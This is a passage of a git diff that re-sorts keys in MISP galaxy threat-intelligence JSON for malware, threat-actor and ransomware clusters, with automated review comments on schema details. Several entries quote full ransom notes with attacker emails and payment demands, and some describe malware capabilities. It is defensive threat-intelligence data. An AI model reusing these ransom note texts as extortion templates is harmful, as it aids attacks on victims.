@@ -15488,103 +15487,104 @@ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf" - ] + ], + "synonyms": [ + "splm", + "chopstick" + ], + "type": [] }, "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", - "value": "X-Agent", - "description": "" + "value": "X-Agent" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbot_pos", "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c6467cc3-dafd-482e-881e-ef2e7e244436", - "value": "XBot POS", - "description": "" + "value": "XBot POS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbtl" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fb3a8164-d8cb-495d-9b1c-57bed00c21ed", - "value": "XBTL", - "description": "" + "value": "XBTL" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpan", "https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/", "https://securelist.com/blog/research/78110/xpan-i-am-your-father/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4da036c4-b76d-4f25-bc9e-3c5944ad0993", - "value": "Xpan", - "description": "" + "value": "Xpan" }, { + "description": "Incorporates code of Quasar RAT.", "meta": { - "synonyms": [ - "Expectra" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpctra", "https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/", "https://www.buguroo.com/en/blog/bank-malware-in-brazil-xpctra-rat-analysis" - ] + ], + 
"synonyms": [ + "Expectra" + ], + "type": [] }, "uuid": "5f9ba149-100a-46eb-a959-0645d872975b", - "value": "XPCTRA", - "description": "Incorporates code of Quasar RAT." + "value": "XPCTRA" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xp_privesc", "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "33f97c52-0bcd-43f4-88bb-99e7da9f49ae", - "value": "XP PrivEsc (CVE-2014-4076)", - "description": "" + "value": "XP PrivEsc (CVE-2014-4076)" }, { + "description": "", "meta": { - "synonyms": [ - "nokian" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" - ] + ], + "synonyms": [ + "nokian" + ], + "type": [] }, "uuid": "b255fd2c-6ddb-452f-b660-c9f5d3a2ff63", - "value": "xsPlus", - "description": "" + "value": "xsPlus" }, { + "description": "", "meta": { - "synonyms": [ - "xaps" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", 
@@ -15595,136 +15595,135 @@ "https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf", "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/", "http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf" - ] + ], + "synonyms": [ + "xaps" + ], + "type": [] }, "uuid": "53089817-6d65-4802-a7d2-5ccc3d919b74", - "value": "X-Tunnel", - "description": "" + "value": "X-Tunnel" }, { + "description": "", "meta": { - "synonyms": [ - "ShadowWalker" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/" - ] + ], + "synonyms": [ + "ShadowWalker" + ], + "type": [] }, "uuid": "1d451231-8b27-4250-b3db-55c5c8ea99cb", - "value": "xxmm", - "description": "" + "value": "xxmm" }, { + "description": "", "meta": { - "synonyms": [ - "KeyBoy" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yahoyah", "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" - ] + ], + "synonyms": [ + "KeyBoy" + ], + "type": [] }, "uuid": "a673b4fb-a864-4a5b-94ab-3fc4f5606cc8", - "value": "Yahoyah", - "description": "" + "value": "Yahoyah" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.yayih", + "https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html" + ], "synonyms": [ "bbsinfo", "aumlib" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.yayih", - 
"https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html" - ] + "type": [] }, "uuid": "81157066-c2f6-4625-8070-c0a793d57e18", - "value": "yayih", - "description": "" + "value": "yayih" }, { + "description": "Simple malware with proxy/RDP and download capabilities. It often comes bundled with installers, in particular in the Chinese realm.\r\n\r\nPE timestamps suggest that it came into existence in the second half of 2014.\r\n\r\nSome versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).\r\n", "meta": { - "synonyms": [ - "DarkShare" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.younglotus", "https://www.youtube.com/watch?v=AUGxYhE_CUY" - ] + ], + "synonyms": [ + "DarkShare" + ], + "type": [] }, "uuid": "1cc9d450-88cd-435c-bb74-8410d2d22571", - "value": "YoungLotus", - "description": "Simple malware with proxy/RDP and download capabilities. 
It often comes bundled with installers, in particular in the Chinese realm.\r\n\r\nPE timestamps suggest that it came into existence in the second half of 2014.\r\n\r\nSome versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).\r\n" + "value": "YoungLotus" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yty", "https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/", "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c0e8b64c-bd2c-4a3e-addc-0ed6cc1ba200", - "value": "yty", - "description": "" + "value": "yty" }, { + "description": "", "meta": { - "synonyms": [ - "Zekapab" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy", "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" - ] + ], + "synonyms": [ + "Zekapab" + ], + "type": [] }, "uuid": "973124e2-0d84-4be5-9c8e-3ff16bb43b42", - "value": "Zebrocy", - "description": "" + "value": "Zebrocy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy_au3", "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4a5f2088-18cb-426a-92e2-1eb752c294c0", - "value": "Zebrocy (AutoIT)", - "description": "" + "value": "Zebrocy (AutoIT)" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zedhou" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2211eade-4980-4143-acd7-5ecda26d9dfa", - "value": "Zedhou", - 
"description": "" + "value": "Zedhou" }, { + "description": "", "meta": { - "synonyms": [ - "Max++", - "Smiscer" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess", "https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/", 
@@ -15735,44 +15734,45 @@ "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/", "http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/", "http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html" - ] + ], + "synonyms": [ + "Max++", + "Smiscer" + ], + "type": [] }, "uuid": "c7ff274f-2acc-4ee2-b74d-f1def12918d7", - "value": "ZeroAccess", - "description": "" + "value": "ZeroAccess" }, { + "description": "ZeroEvil is a malware that seems to be distributed by an ARSguarded VBS loader.\r\n\r\nIt first connects to a gate.php (version=). Upon success, an embedded VBS gets started connecting to logs_gate.php (plugin=, report=).\r\nSo far, only one embedded VBS was observed: it creates and starts a PowerShell script to retrieve all password from the Windows.Security.Credentials.PasswordVault. Apart from that, a screenshot is taken and a list of running processes generated.\r\n\r\nThe ZeroEvil executable contains multiple DLLs, sqlite3.dll, ze_core.DLL (Mutex) and ze_autorun.DLL (Run-Key).\r\n", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroevil", "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "585f9f75-1239-4561-8815-c5ae033053a1", - "value": "ZeroEvil", - "description": "ZeroEvil is a malware that seems to be distributed by an ARSguarded VBS loader.\r\n\r\nIt first connects to a gate.php (version=). Upon success, an embedded VBS gets started connecting to logs_gate.php (plugin=, report=).\r\nSo far, only one embedded VBS was observed: it creates and starts a PowerShell script to retrieve all password from the Windows.Security.Credentials.PasswordVault. 
Apart from that, a screenshot is taken and a list of running processes generated.\r\n\r\nThe ZeroEvil executable contains multiple DLLs, sqlite3.dll, ze_core.DLL (Mutex) and ze_autorun.DLL (Run-Key).\r\n" + "value": "ZeroEvil" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerot", "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9b0aa458-dfa9-48af-87ea-c36d1501376c", - "value": "ZeroT", - "description": "" + "value": "ZeroT" }, { + "description": "", "meta": { - "synonyms": [ - "Zbot" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus", "http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html", 
@@ -15793,156 +15793,156 @@ "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html", "https://zeustracker.abuse.ch/monitor.php", "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html" - ] + ], + "synonyms": [ + "Zbot" + ], + "type": [] }, "uuid": "4e8c1ab7-2841-4823-a5d1-39284fb0969a", - "value": "Zeus", - "description": "" + "value": "Zeus" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_mailsniffer" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "768f1ae5-81a6-49f2-87c1-821c247b4bf3", - "value": "Zeus MailSniffer", - "description": "" + "value": "Zeus MailSniffer" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx", "https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/", "https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/", "https://securityintelligence.com/uk-banks-hit-with-new-zeus-sphinx-variant-and-renewed-kronos-banking-trojan-attacks/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "997c20b0-0992-498a-b69d-fc16ab2fd4e4", - "value": "Zeus Sphinx", - "description": "" + "value": "Zeus Sphinx" }, { + "description": "The sample listed here was previously mislabeled and is now integrated into win.floki_bot. The family is to-be-updated once we have a \"real\" Zeus SSL sample.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_ssl" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "74fc6a3a-cc51-4065-bdd9-fcef18c988a0", - "value": "Zeus SSL", - "description": "The sample listed here was previously mislabeled and is now integrated into win.floki_bot. The family is to-be-updated once we have a \"real\" Zeus SSL sample." 
+ "value": "Zeus SSL" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zezin", "https://twitter.com/siri_urz/status/923479126656323584", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4877" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "38de079b-cc4c-47b0-b47f-ad4c013d8a1f", - "value": "Zezin", - "description": "" + "value": "Zezin" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhcat", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3c74a04d-583e-40ec-b347-bdfeb534c614", - "value": "ZhCat", - "description": "" + "value": "ZhCat" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhmimikatz", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "989330e9-52da-4489-888b-686429db3a45", - "value": "ZhMimikatz", - "description": "" + "value": "ZhMimikatz" }, { + "description": "A banking trojan first observed in October 2016 has grown into a sophisticated hacking tool that works primarily as a banking trojan, but could also be used as an infostealer or backdoor.", "meta": { - "synonyms": [ - "Zeus Terdot" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader", "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/", "https://labs.bitdefender.com/2017/11/terdot-zeus-based-malware-strikes-back-with-a-blast-from-the-past/", "https://www.arbornetworks.com/blog/asert/great-dga-sphinx/" - ] + ], + "synonyms": [ + "Zeus Terdot" + ], + "type": [] }, "uuid": "13236f94-802b-4abc-aaa9-cb80cf4df9ed", - "value": "Zloader", - 
"description": "A banking trojan first observed in October 2016 has grown into a sophisticated hacking tool that works primarily as a banking trojan, but could also be used as an infostealer or backdoor." + "value": "Zloader" }, { + "description": "", "meta": { - "synonyms": [ - "gresim" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zoxpng", "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf" - ] + ], + "synonyms": [ + "gresim" + ], + "type": [] }, "uuid": "7078d273-8a2d-477a-b6d9-7313e22d9ad7", - "value": "ZoxPNG", - "description": "" + "value": "ZoxPNG" }, { + "description": "", "meta": { - "synonyms": [ - "Sensocode" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zxshell", "https://blogs.cisco.com/security/talos/opening-zxshell", "https://blogs.rsa.com/cat-phishing/", "https://github.com/smb01/zxshell" - ] + ], + "synonyms": [ + "Sensocode" + ], + "type": [] }, "uuid": "23920e3b-246a-4172-bf9b-5e9f90510a15", - "value": "ZXShell", - "description": "" + "value": "ZXShell" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zyklon", "https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "721e9af0-8a60-4b9e-9137-c23e86d75722", - "value": "Zyklon", - "description": "" + "value": "Zyklon" } ], - "version": 1649, - "source": "Malpedia", - "name": "Malpedia", - "uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e" + "version": 1649 } diff --git a/clusters/microsoft-activity-group.json b/clusters/microsoft-activity-group.json index e1a15d8..794be13 100644 --- a/clusters/microsoft-activity-group.json +++ b/clusters/microsoft-activity-group.json 
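Review bot: The tail of this hunk drops the galaxy-level `"source": "Malpedia"`, `"name": "Malpedia"` and `"uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e"` keys from the new side and keeps only `"version": 1649`. If the rest of the commit sorts keys alphabetically these three were presumably re-added near the top of the file in a hunk not shown here, but that should be confirmed, because without the top-level `uuid` the cluster loses its identifier and a key-sorting pass should never change the set of keys. A cheap check is to parse the old and new file and compare their top-level key sets.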
@@ -205,27 +205,27 @@
 "value": "ZIRCONIUM"
 },
 {
- "value": "https://www.cfr.org/interactive/cyber-operations/mythic-leopard",
 "description": "This threat actor uses social engineering and spear phishing to target military and defense organizations in India, for the purpose of espionage.",
 "meta": {
- "refs": [
- "https://www.cfr.org/interactive/cyber-operations/mythic-leopard"
- ],
+ "cfr-suspected-state-sponsor": "Pakistan",
 "cfr-suspected-victims": [
 "India"
 ],
- "cfr-suspected-state-sponsor": "Pakistan",
- "cfr-type-of-incident": "Espionage",
 "cfr-target-category": [
 "Government",
 "Private sector"
 ],
+ "cfr-type-of-incident": "Espionage",
+ "refs": [
+ "https://www.cfr.org/interactive/cyber-operations/mythic-leopard"
+ ],
 "synonyms": [
 "C-Major",
 "Transparent Tribe"
 ]
 },
- "uuid": "2a410eea-a9da-11e8-b404-37b7060746c8"
+ "uuid": "2a410eea-a9da-11e8-b404-37b7060746c8",
+ "value": "https://www.cfr.org/interactive/cyber-operations/mythic-leopard"
 }
 ],
 "version": 5
diff --git a/clusters/ransomware.json b/clusters/ransomware.json
index 0c73b7c..90dbc50 100644
--- a/clusters/ransomware.json
+++ b/clusters/ransomware.json
@@ -3236,16 +3236,16 @@
 "https://www.bleepingcomputer.com/news/security/new-bip-dharma-ransomware-variant-released/"
 ]
 },
- "uuid": "2b365b2c-4a9a-4b66-804d-3b2d2814fe7b",
 "related": [
 {
 "dest-uuid": "15a30d84-4f5f-4b75-a162-e36107d30215",
- "type": "similar",
 "tags": [
 "estimative-language:likelihood-probability=\"likely\""
- ]
+ ],
+ "type": "similar"
 }
 ],
+ "uuid": "2b365b2c-4a9a-4b66-804d-3b2d2814fe7b",
 "value": "Dharma Ransomware"
 },
 {
@@ -9064,16 +9064,16 @@
 "CrySiS"
 ]
 },
- "uuid": "15a30d84-4f5f-4b75-a162-e36107d30215",
 "related": [
 {
 "dest-uuid": "2b365b2c-4a9a-4b66-804d-3b2d2814fe7b",
- "type": "similar",
 "tags": [
 "estimative-language:likelihood-probability=\"likely\""
- ]
+ ],
+ "type": "similar"
 }
 ],
+ "uuid": "15a30d84-4f5f-4b75-a162-e36107d30215",
 "value": "Virus-Encoder"
 },
 {
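Review bot: The `+ "value": "https://www.cfr.org/interactive/cyber-operations/mythic-leopard"` line that this hunk moves to the end of the entry keeps a URL as the cluster value, so the actor is displayed by its reference link rather than by a name, and the same URL already sits in `refs`. Presumably the intended value is the actor name the slug encodes, e.g. `"value": "Mythic Leopard"` (or one of the listed synonyms), which should be confirmed against the CFR entry before changing. The commit only reorders the keys, so this is pre-existing, but it is the one concrete defect on the new side of this hunk.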
@@ -9799,17 +9799,17 @@
 {
 "description": "LockCrypt is an example of yet another simple ransomware created and used by unsophisticated attackers. Its authors ignored well-known guidelines about the proper use of cryptography. The internal structure of the application is also unprofessional. Sloppy, unprofessional code is pretty commonplace when ransomware is created for manual distribution. Authors don’t take much time preparing the attack or the payload. Instead, they’re rather focused on a fast and easy gain, rather than on creating something for the long run. Because of this, they could easily be defeated.",
 "meta": {
- "refs": [
- "https://www.bleepingcomputer.com/news/security/lockcrypt-ransomware-cracked-due-to-bad-crypto/",
- "https://twitter.com/malwrhunterteam/status/1034436350748053504",
- "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/"
- ],
 "extensions": [
 ".BadNews"
 ],
 "ransomnotes": [
 "How To Decode Files.hta",
 "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/DlsLwUjXsAA0xyY[1].jpg"
+ ],
+ "refs": [
+ "https://www.bleepingcomputer.com/news/security/lockcrypt-ransomware-cracked-due-to-bad-crypto/",
+ "https://twitter.com/malwrhunterteam/status/1034436350748053504",
+ "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/"
 ]
 },
 "uuid": "ac070e9a-3cbe-11e8-9f9d-839e888f2340",
@@ -10387,55 +10387,50 @@ "value": "Unnamed Android Ransomware" }, { - "value": "KEYPASS", "description": "A new distribution campaign is underway for a STOP Ransomware variant called KeyPass based on the amount of victims that have been seen. Unfortunately, how the ransomware is being distributed is unknown at this time.", "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/new-keypass-ransomware-campaign-underway/" - ], - "synonyms": [ - "KeyPass" + "extensions": [ + ".KEYPASS" ], "ransomnotes": [ "!!!KEYPASS_DECRYPTION_INFO!!!.txt", "Attention!\n\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KEYPASS\n\nThe only method of recovering files is to purchase an decrypt software and unique private key.\n\nAfter purchase you will start decrypt software, enter your unique private key and it will decrypt all your data.\n\nOnly we can give you this key and only we can recover your files.\n\nYou need to contact us by e-mail keypass@bitmessage.ch send us your personal ID and wait for further instructions.\n\nFor you to be sure, that we can decrypt your files - you can send us a 1-3 any not very big encrypted files and we will send you back it in a original form FREE.\n\nPrice for decryption $300.\n\nThis price avaliable if you contact us first 72 hours.\n\nE-mail address to contact us:\n\nkeypass@bitmessage.ch\n\n\n\nReserve e-mail address to contact us:\n\nkeypass@india.com\n\n\n\nYour personal id:\n[id]" ], - "extensions": [ - ".KEYPASS" + "refs": [ + "https://www.bleepingcomputer.com/news/security/new-keypass-ransomware-campaign-underway/" + ], + "synonyms": [ + "KeyPass" ] }, - "uuid": "22b4070e-9efe-11e8-b617-ab269f54596c" + "uuid": "22b4070e-9efe-11e8-b617-ab269f54596c", + "value": "KEYPASS" }, { - "value": "STOP Ransomware", - "uuid": "c76c4d24-9f99-11e8-808d-a7f1c66a53c5" + "uuid": "c76c4d24-9f99-11e8-808d-a7f1c66a53c5", + "value": "STOP Ransomware" }, { - "value": "Barack Obama's 
Everlasting Blue Blackmail Virus Ransomware", "description": "A new ransomware that only encrypts .EXE files on a computer. It then displays a screen with a picture of President Obama that asks for a \"tip\" to decrypt the files.", "meta": { + "ransomnotes": [ + "https://www.bleepstatic.com/images/news/ransomware/b/barack-obama-ransomware/barack-obama-everlasting-blue-blackmail-virus.jpg", + "Hello, your computer is encrypted by me! Yeah, that means your EXE file isn't open! Because I encrypted it.\nSo you can decrypt it, but you have to tip it. This is a big thing. You can email this email: 2200287831@qq.com gets more information." + ], "refs": [ "https://twitter.com/malwrhunterteam/status/1032242391665790981", "https://www.bleepingcomputer.com/news/security/barack-obamas-blackmail-virus-ransomware-only-encrypts-exe-files/" ], "synonyms": [ "Barack Obama's Blackmail Virus Ransomware" - ], - "ransomnotes": [ - "https://www.bleepstatic.com/images/news/ransomware/b/barack-obama-ransomware/barack-obama-everlasting-blue-blackmail-virus.jpg", - "Hello, your computer is encrypted by me! Yeah, that means your EXE file isn't open! Because I encrypted it.\nSo you can decrypt it, but you have to tip it. This is a big thing. You can email this email: 2200287831@qq.com gets more information." ] }, - "uuid": "1a98f5ca-b024-11e8-b828-1fb7dbd6619e" + "uuid": "1a98f5ca-b024-11e8-b828-1fb7dbd6619e", + "value": "Barack Obama's Everlasting Blue Blackmail Virus Ransomware" }, { - "value": "CryptoNar", "description": "When the CryptoNar, or Crypto Nar, Ransomware encrypts a victims files it will perform the encryption differently depending on the type of file being encrypted.\nIf the targeted file has a .txt or .md extension, it will encrypt the entire file and append the .fully.cryptoNar extension to the encrypted file's name. 
All other files will only have the first 1,024 bytes encrypted and will have the .partially.cryptoNar extensions appended to the file's name.", "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/cryptonar-ransomware-discovered-and-quickly-decrypted/", - "https://twitter.com/malwrhunterteam/status/1034492151541977088" - ], "extensions": [ ".fully.cryptoNar", ".partially.cryptoNar" @@ -10443,9 +10438,12 @@ "ransomnotes": [ "CRYPTONAR RECOVERY INFORMATION.txt", "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/ransom-note.jpg" + ], + "refs": [ + "https://www.bleepingcomputer.com/news/security/cryptonar-ransomware-discovered-and-quickly-decrypted/", + "https://twitter.com/malwrhunterteam/status/1034492151541977088" ] }, - "uuid": "10f92054-b028-11e8-a51f-2f82236ac72d", "related": [ { "dest-uuid": "2fb307a2-8752-4521-8973-75b68703030d", @@ -10454,24 +10452,25 @@ ], "type": "similar" } - ] + ], + "uuid": "10f92054-b028-11e8-a51f-2f82236ac72d", + "value": "CryptoNar" }, { - "value": "CreamPie Ransomware", "description": "Jakub Kroustek found what appears to be an in-dev version of the CreamPie Ransomware. It does not currently display a ransom note, but does encrypt files and appends the .[backdata@cock.li].CreamPie extension to them.", "meta": { + "extensions": [ + ".[backdata@cock.li].CreamPie" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/", "https://twitter.com/JakubKroustek/status/1033656080839139333" - ], - "extensions": [ - ".[backdata@cock.li].CreamPie" ] }, - "uuid": "1b5a756e-b034-11e8-9e7d-c3271796acab" + "uuid": "1b5a756e-b034-11e8-9e7d-c3271796acab", + "value": "CreamPie Ransomware" }, { - "value": "Jeff the Ransomware", "description": "Looks to be in-development as it does not encrypt.", "meta": { "refs": [ 
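Review bot: KEYPASS's description states it is a STOP Ransomware variant and the STOP entry (`"uuid": "c76c4d24-9f99-11e8-808d-a7f1c66a53c5"`) is re-sorted directly below it, yet neither carries a `related` link, although the file records exactly this kind of relationship with `related`/`dest-uuid`/`"type": "similar"` (CryptoNar in this same hunk). The STOP entry itself has no `description` or `refs`, so the KeyPass sentence is the only documentation of STOP visible here; a link in each direction would at least make that navigable. Below is the block to add to KEYPASS, placed before `uuid` to keep the sorted key order the commit establishes; STOP gets the mirror image with `dest-uuid` `22b4070e-9efe-11e8-b617-ab269f54596c`, and the file's `"version": 37` should be bumped with it.
```json
"related": [
  {
    "dest-uuid": "c76c4d24-9f99-11e8-808d-a7f1c66a53c5",
    "tags": [
      "estimative-language:likelihood-probability=\"likely\""
    ],
    "type": "similar"
  }
],
"uuid": "22b4070e-9efe-11e8-b617-ab269f54596c",
"value": "KEYPASS"
```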
@@ -10479,16 +10478,12 @@ "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/" ] }, - "uuid": "7854c8bc-b036-11e8-bfb0-4ff71e54bbb2" + "uuid": "7854c8bc-b036-11e8-bfb0-4ff71e54bbb2", + "value": "Jeff the Ransomware" }, { - "value": "Cassetto Ransomware", "description": "Michael Gillespie saw an encrypted file uploaded to ID Ransomware that appends the .cassetto extension and drops a ransom note named IMPORTANT ABOUT DECRYPT.txt.", "meta": { - "refs": [ - "https://twitter.com/demonslay335/status/1034213399922524160", - "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/" - ], "extensions": [ ".cassetto" ], 
@@ -10496,100 +10491,104 @@ "IMPORTANT ABOUT DECRYPT.txt", "L!W2Be%BS4\nWARNING!! YOU ARE SO F*UCKED!!!\n\nYour Files Has Encrypted\n\nWhat happened to your files?\nAll of your files were protected by a strong encryptation\nThere is no way to decrypt your files without the key.\nIf your files not important for you just reinstall your system.\nx§If your files is important just email us to discuss the the price and how to decrypt your files.\n\nYou can email us to omg-help-me@openmailbox.org\n\nWe accept just BITCOIN if you don´t know what it is just google it.\nWe will give instructions where and how you buy bitcoin in your country.\nPrice depends on how important your files and network is.\nIt could be 0.5 bitcoin to 25 bitcoin.\nYou can send us a encrypted file for decryption.\nFell free to email us with your country, computer name and username of the infected system.", "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/DlpDe-kXsAA2lmH[1].jpg" + ], + "refs": [ + "https://twitter.com/demonslay335/status/1034213399922524160", + "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/" ] }, - "uuid": "7d3287f0-b03d-11e8-b1ef-23485f43e7f9" + "uuid": "7d3287f0-b03d-11e8-b1ef-23485f43e7f9", + "value": "Cassetto Ransomware" }, { - "value": "Acroware Cryptolocker Ransomware", "description": "Leo discovered a screenlocker that calls itself Acroware Cryptolocker Ransomware. 
